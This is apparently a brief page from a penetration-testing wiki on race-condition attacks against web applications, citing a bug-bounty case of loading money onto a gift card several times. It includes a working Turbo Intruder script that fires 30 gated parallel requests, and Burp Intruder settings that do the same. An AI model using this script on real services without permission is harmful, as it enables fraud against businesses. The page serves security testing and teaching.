Physical attacks
Mobile Apps Pentesting
Pentesting

Race Condition

When you make the web page perform some action that should be done only once, but if the action is done several times you will be benefited, you really need to try a Race condicion. Most of the time this is directly related with money (if an action is made you get X money, so let's try to make it several time very quickly)

For example, in this bug the hunter was able to load the money inside a gift card several times.

This is the turbo intruder script used to test the race condition of the mentioned writeup:

def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=30,
pipeline=False
)
for i in range(30):
engine.queue(target.req, i)
engine.queue(target.req, target.baseInput, gate='race1')
engine.start(timeout=5)
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)

Using also BURP you could also send the request to Intruder, set the number of threads to 30 inside the Options menu and, select as payload Null payloads and generate 30.